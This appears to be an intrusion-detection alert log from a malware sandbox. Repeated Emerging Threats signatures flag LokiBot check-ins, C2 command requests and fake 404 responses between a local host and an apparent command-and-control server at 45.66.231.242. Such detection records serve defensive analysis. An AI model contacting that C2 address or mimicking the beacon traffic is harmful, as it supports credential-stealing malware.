              2024-10-01T10:55:24.716379+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975745.66.231.24280TCP
              2024-10-01T10:55:24.716379+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975745.66.231.24280TCP
              2024-10-01T10:55:25.375102+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975745.66.231.24280TCP
              2024-10-01T10:55:25.375102+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975745.66.231.24280TCP
              2024-10-01T10:55:25.379994+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449757TCP
              2024-10-01T10:55:25.534367+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975845.66.231.24280TCP
              2024-10-01T10:55:25.534367+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975845.66.231.24280TCP
              2024-10-01T10:55:25.534367+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975845.66.231.24280TCP
              2024-10-01T10:55:26.195469+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975845.66.231.24280TCP
              2024-10-01T10:55:26.195469+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975845.66.231.24280TCP
              2024-10-01T10:55:26.200291+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449758TCP
              2024-10-01T10:55:26.361457+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975945.66.231.24280TCP
              2024-10-01T10:55:26.361457+02002025381ET MALWARE LokiBot Checkin1192.168.2.44975945.66.231.24280TCP
              2024-10-01T10:55:26.361457+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975945.66.231.24280TCP
              2024-10-01T10:55:27.085668+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975945.66.231.24280TCP
              2024-10-01T10:55:27.085668+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975945.66.231.24280TCP
              2024-10-01T10:55:27.090660+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449759TCP
              2024-10-01T10:55:27.260785+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976045.66.231.24280TCP
              2024-10-01T10:55:27.260785+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976045.66.231.24280TCP
              2024-10-01T10:55:27.260785+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976045.66.231.24280TCP
              2024-10-01T10:55:27.951507+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976045.66.231.24280TCP
              2024-10-01T10:55:27.951507+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976045.66.231.24280TCP
              2024-10-01T10:55:27.956334+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449760TCP
              2024-10-01T10:55:28.111446+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976145.66.231.24280TCP
              2024-10-01T10:55:28.111446+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976145.66.231.24280TCP
              2024-10-01T10:55:28.111446+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976145.66.231.24280TCP
              2024-10-01T10:55:28.839624+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976145.66.231.24280TCP
              2024-10-01T10:55:28.839624+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976145.66.231.24280TCP
              2024-10-01T10:55:28.844483+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449761TCP
              2024-10-01T10:55:28.997001+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976245.66.231.24280TCP
              2024-10-01T10:55:28.997001+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976245.66.231.24280TCP
              2024-10-01T10:55:28.997001+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976245.66.231.24280TCP
              2024-10-01T10:55:29.661872+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976245.66.231.24280TCP
              2024-10-01T10:55:29.661872+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976245.66.231.24280TCP
              2024-10-01T10:55:29.666645+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449762TCP
              2024-10-01T10:55:29.807741+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976345.66.231.24280TCP
              2024-10-01T10:55:29.807741+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976345.66.231.24280TCP
              2024-10-01T10:55:29.807741+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976345.66.231.24280TCP
              2024-10-01T10:55:30.557844+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976345.66.231.24280TCP
              2024-10-01T10:55:30.557844+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976345.66.231.24280TCP
              2024-10-01T10:55:30.563306+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449763TCP
              2024-10-01T10:55:30.730772+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976445.66.231.24280TCP
              2024-10-01T10:55:30.730772+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976445.66.231.24280TCP
              2024-10-01T10:55:30.730772+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976445.66.231.24280TCP
              2024-10-01T10:55:31.394167+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976445.66.231.24280TCP
              2024-10-01T10:55:31.394167+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976445.66.231.24280TCP
              2024-10-01T10:55:31.399345+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449764TCP
              2024-10-01T10:55:31.541452+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976545.66.231.24280TCP
              2024-10-01T10:55:31.541452+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976545.66.231.24280TCP
              2024-10-01T10:55:31.541452+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976545.66.231.24280TCP
              2024-10-01T10:55:32.194135+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976545.66.231.24280TCP
              2024-10-01T10:55:32.194135+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976545.66.231.24280TCP
              2024-10-01T10:55:32.198987+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449765TCP
              2024-10-01T10:55:32.344919+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976645.66.231.24280TCP
              2024-10-01T10:55:32.344919+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976645.66.231.24280TCP
              2024-10-01T10:55:32.344919+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976645.66.231.24280TCP
              2024-10-01T10:55:33.025064+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976645.66.231.24280TCP
              2024-10-01T10:55:33.025064+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976645.66.231.24280TCP
              2024-10-01T10:55:33.049597+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449766TCP
              2024-10-01T10:55:33.286078+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976745.66.231.24280TCP
              2024-10-01T10:55:33.286078+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976745.66.231.24280TCP
              2024-10-01T10:55:33.286078+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976745.66.231.24280TCP
              2024-10-01T10:55:33.949352+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976745.66.231.24280TCP
              2024-10-01T10:55:33.949352+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976745.66.231.24280TCP
              2024-10-01T10:55:33.954180+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449767TCP
              2024-10-01T10:55:34.118881+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976845.66.231.24280TCP
              2024-10-01T10:55:34.118881+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976845.66.231.24280TCP
              2024-10-01T10:55:34.118881+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976845.66.231.24280TCP
              2024-10-01T10:55:34.773757+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976845.66.231.24280TCP
              2024-10-01T10:55:34.773757+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976845.66.231.24280TCP
              2024-10-01T10:55:34.781785+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449768TCP
              2024-10-01T10:55:34.933166+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976945.66.231.24280TCP
              2024-10-01T10:55:34.933166+02002025381ET MALWARE LokiBot Checkin1192.168.2.44976945.66.231.24280TCP
              2024-10-01T10:55:34.933166+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976945.66.231.24280TCP
              2024-10-01T10:55:35.685085+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976945.66.231.24280TCP
              2024-10-01T10:55:35.685085+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976945.66.231.24280TCP
              2024-10-01T10:55:35.689906+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449769TCP
              2024-10-01T10:55:35.839128+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977045.66.231.24280TCP
              2024-10-01T10:55:35.839128+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977045.66.231.24280TCP
              2024-10-01T10:55:35.839128+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977045.66.231.24280TCP
              2024-10-01T10:55:36.536343+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977045.66.231.24280TCP
              2024-10-01T10:55:36.536343+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977045.66.231.24280TCP
              2024-10-01T10:55:36.541214+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449770TCP
              2024-10-01T10:55:36.706651+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977145.66.231.24280TCP
              2024-10-01T10:55:36.706651+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977145.66.231.24280TCP
              2024-10-01T10:55:36.706651+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977145.66.231.24280TCP
              2024-10-01T10:55:37.350895+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977145.66.231.24280TCP
              2024-10-01T10:55:37.350895+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977145.66.231.24280TCP
              2024-10-01T10:55:37.355853+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449771TCP
              2024-10-01T10:55:37.524416+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977245.66.231.24280TCP
              2024-10-01T10:55:37.524416+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977245.66.231.24280TCP
              2024-10-01T10:55:37.524416+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977245.66.231.24280TCP
              2024-10-01T10:55:38.216992+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977245.66.231.24280TCP
              2024-10-01T10:55:38.216992+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977245.66.231.24280TCP
              2024-10-01T10:55:38.221829+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449772TCP
              2024-10-01T10:55:38.374178+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977345.66.231.24280TCP
              2024-10-01T10:55:38.374178+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977345.66.231.24280TCP
              2024-10-01T10:55:38.374178+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977345.66.231.24280TCP
              2024-10-01T10:55:39.220320+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977345.66.231.24280TCP
              2024-10-01T10:55:39.220320+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977345.66.231.24280TCP
              2024-10-01T10:55:39.225109+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449773TCP
              2024-10-01T10:55:39.385441+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977445.66.231.24280TCP
              2024-10-01T10:55:39.385441+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977445.66.231.24280TCP
              2024-10-01T10:55:39.385441+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977445.66.231.24280TCP
              2024-10-01T10:55:40.152556+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977445.66.231.24280TCP
              2024-10-01T10:55:40.152556+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977445.66.231.24280TCP
              2024-10-01T10:55:40.160479+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449774TCP
              2024-10-01T10:55:40.328121+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977545.66.231.24280TCP
              2024-10-01T10:55:40.328121+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977545.66.231.24280TCP
              2024-10-01T10:55:40.328121+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977545.66.231.24280TCP
              2024-10-01T10:55:41.022138+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977545.66.231.24280TCP
              2024-10-01T10:55:41.022138+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977545.66.231.24280TCP
              2024-10-01T10:55:41.026897+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449775TCP
              2024-10-01T10:55:41.381303+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977645.66.231.24280TCP
              2024-10-01T10:55:41.381303+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977645.66.231.24280TCP
              2024-10-01T10:55:41.381303+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977645.66.231.24280TCP
              2024-10-01T10:55:42.240978+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977645.66.231.24280TCP
              2024-10-01T10:55:42.240978+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977645.66.231.24280TCP
              2024-10-01T10:55:42.246152+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449776TCP
              2024-10-01T10:55:42.421721+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977745.66.231.24280TCP
              2024-10-01T10:55:42.421721+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977745.66.231.24280TCP
              2024-10-01T10:55:42.421721+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977745.66.231.24280TCP
              2024-10-01T10:55:43.424782+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977745.66.231.24280TCP
              2024-10-01T10:55:43.424782+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977745.66.231.24280TCP
              2024-10-01T10:55:43.429625+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449777TCP
              2024-10-01T10:55:43.589678+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977845.66.231.24280TCP
              2024-10-01T10:55:43.589678+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977845.66.231.24280TCP
              2024-10-01T10:55:43.589678+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977845.66.231.24280TCP
              2024-10-01T10:55:47.272279+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977845.66.231.24280TCP
              2024-10-01T10:55:47.272279+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977845.66.231.24280TCP
              2024-10-01T10:55:47.277080+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449778TCP
              2024-10-01T10:55:47.464644+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977945.66.231.24280TCP
              2024-10-01T10:55:47.464644+02002025381ET MALWARE LokiBot Checkin1192.168.2.44977945.66.231.24280TCP
              2024-10-01T10:55:47.464644+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977945.66.231.24280TCP
              2024-10-01T10:55:48.112864+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977945.66.231.24280TCP
              2024-10-01T10:55:48.112864+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977945.66.231.24280TCP
              2024-10-01T10:55:48.117744+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449779TCP
              2024-10-01T10:55:48.292929+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978045.66.231.24280TCP
              2024-10-01T10:55:48.292929+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978045.66.231.24280TCP
              2024-10-01T10:55:48.292929+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978045.66.231.24280TCP
              2024-10-01T10:55:48.953210+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978045.66.231.24280TCP
              2024-10-01T10:55:48.953210+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978045.66.231.24280TCP
              2024-10-01T10:55:48.973432+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449780TCP
              2024-10-01T10:55:49.348506+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978145.66.231.24280TCP
              2024-10-01T10:55:49.348506+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978145.66.231.24280TCP
              2024-10-01T10:55:49.348506+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978145.66.231.24280TCP
              2024-10-01T10:55:50.176120+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978145.66.231.24280TCP
              2024-10-01T10:55:50.176120+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978145.66.231.24280TCP
              2024-10-01T10:55:50.181516+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449781TCP
              2024-10-01T10:55:50.343657+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978245.66.231.24280TCP
              2024-10-01T10:55:50.343657+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978245.66.231.24280TCP
              2024-10-01T10:55:50.343657+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978245.66.231.24280TCP
              2024-10-01T10:55:50.990247+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978245.66.231.24280TCP
              2024-10-01T10:55:50.990247+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978245.66.231.24280TCP
              2024-10-01T10:55:50.995191+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449782TCP
              2024-10-01T10:55:51.144817+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978345.66.231.24280TCP
              2024-10-01T10:55:51.144817+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978345.66.231.24280TCP
              2024-10-01T10:55:51.144817+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978345.66.231.24280TCP
              2024-10-01T10:55:51.898024+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978345.66.231.24280TCP
              2024-10-01T10:55:51.898024+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978345.66.231.24280TCP
              2024-10-01T10:55:51.902879+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449783TCP
              2024-10-01T10:55:52.156456+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978445.66.231.24280TCP
              2024-10-01T10:55:52.156456+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978445.66.231.24280TCP
              2024-10-01T10:55:52.156456+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978445.66.231.24280TCP
              2024-10-01T10:55:53.034432+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978445.66.231.24280TCP
              2024-10-01T10:55:53.034432+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978445.66.231.24280TCP
              2024-10-01T10:55:53.039442+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449784TCP
              2024-10-01T10:55:53.192942+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978645.66.231.24280TCP
              2024-10-01T10:55:53.192942+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978645.66.231.24280TCP
              2024-10-01T10:55:53.192942+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978645.66.231.24280TCP
              2024-10-01T10:55:53.833889+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978645.66.231.24280TCP
              2024-10-01T10:55:53.833889+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978645.66.231.24280TCP
              2024-10-01T10:55:53.838641+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449786TCP
              2024-10-01T10:55:53.988611+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978745.66.231.24280TCP
              2024-10-01T10:55:53.988611+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978745.66.231.24280TCP
              2024-10-01T10:55:53.988611+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978745.66.231.24280TCP
              2024-10-01T10:55:54.639139+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978745.66.231.24280TCP
              2024-10-01T10:55:54.639139+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978745.66.231.24280TCP
              2024-10-01T10:55:54.643998+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449787TCP
              2024-10-01T10:55:54.958720+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978845.66.231.24280TCP
              2024-10-01T10:55:54.958720+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978845.66.231.24280TCP
              2024-10-01T10:55:54.958720+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978845.66.231.24280TCP
              2024-10-01T10:55:55.642415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978845.66.231.24280TCP
              2024-10-01T10:55:55.642415+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978845.66.231.24280TCP
              2024-10-01T10:55:55.647797+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449788TCP
              2024-10-01T10:55:55.793611+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44978945.66.231.24280TCP
              2024-10-01T10:55:55.793611+02002025381ET MALWARE LokiBot Checkin1192.168.2.44978945.66.231.24280TCP
              2024-10-01T10:55:55.793611+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978945.66.231.24280TCP
              2024-10-01T10:55:56.438948+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978945.66.231.24280TCP
              2024-10-01T10:55:56.438948+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978945.66.231.24280TCP
              2024-10-01T10:55:56.443702+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449789TCP
              2024-10-01T10:55:56.591640+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979045.66.231.24280TCP
              2024-10-01T10:55:56.591640+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979045.66.231.24280TCP
              2024-10-01T10:55:56.591640+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979045.66.231.24280TCP
              2024-10-01T10:55:57.289043+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979045.66.231.24280TCP
              2024-10-01T10:55:57.289043+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979045.66.231.24280TCP
              2024-10-01T10:55:57.293823+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449790TCP
              2024-10-01T10:55:57.452108+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979145.66.231.24280TCP
              2024-10-01T10:55:57.452108+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979145.66.231.24280TCP
              2024-10-01T10:55:57.452108+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979145.66.231.24280TCP
              2024-10-01T10:55:58.586844+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979145.66.231.24280TCP
              2024-10-01T10:55:58.586844+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979145.66.231.24280TCP
              2024-10-01T10:55:58.598040+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449791TCP
              2024-10-01T10:55:58.764642+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979245.66.231.24280TCP
              2024-10-01T10:55:58.764642+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979245.66.231.24280TCP
              2024-10-01T10:55:58.764642+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979245.66.231.24280TCP
              2024-10-01T10:55:59.517374+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979245.66.231.24280TCP
              2024-10-01T10:55:59.517374+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979245.66.231.24280TCP
              2024-10-01T10:55:59.522201+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449792TCP
              2024-10-01T10:55:59.680645+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979345.66.231.24280TCP
              2024-10-01T10:55:59.680645+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979345.66.231.24280TCP
              2024-10-01T10:55:59.680645+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979345.66.231.24280TCP
              2024-10-01T10:56:00.358622+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979345.66.231.24280TCP
              2024-10-01T10:56:00.358622+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979345.66.231.24280TCP
              2024-10-01T10:56:00.363531+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449793TCP
              2024-10-01T10:56:00.513321+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979445.66.231.24280TCP
              2024-10-01T10:56:00.513321+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979445.66.231.24280TCP
              2024-10-01T10:56:00.513321+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979445.66.231.24280TCP
              2024-10-01T10:56:10.260937+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979445.66.231.24280TCP
              2024-10-01T10:56:10.260937+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979445.66.231.24280TCP
              2024-10-01T10:56:10.265824+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449794TCP
              2024-10-01T10:56:10.439429+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979545.66.231.24280TCP
              2024-10-01T10:56:10.439429+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979545.66.231.24280TCP
              2024-10-01T10:56:10.439429+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979545.66.231.24280TCP
              2024-10-01T10:56:11.179166+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979545.66.231.24280TCP
              2024-10-01T10:56:11.179166+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979545.66.231.24280TCP
              2024-10-01T10:56:11.184005+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449795TCP
              2024-10-01T10:56:11.353855+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979645.66.231.24280TCP
              2024-10-01T10:56:11.353855+02002025381ET MALWARE LokiBot Checkin1192.168.2.44979645.66.231.24280TCP
              2024-10-01T10:56:11.353855+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979645.66.231.24280TCP
              2024-10-01T10:56:12.004600+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979645.66.231.24280TCP
              2024-10-01T10:56:12.004600+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979645.66.231.24280TCP
              2024-10-01T10:56:12.009437+02002025483ET MALWARE LokiBot Fake 404 Response145.66.231.24280192.168.2.449796TCP
              2024-10-01T10:56:12.182284+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979745.66.231.24280TCP
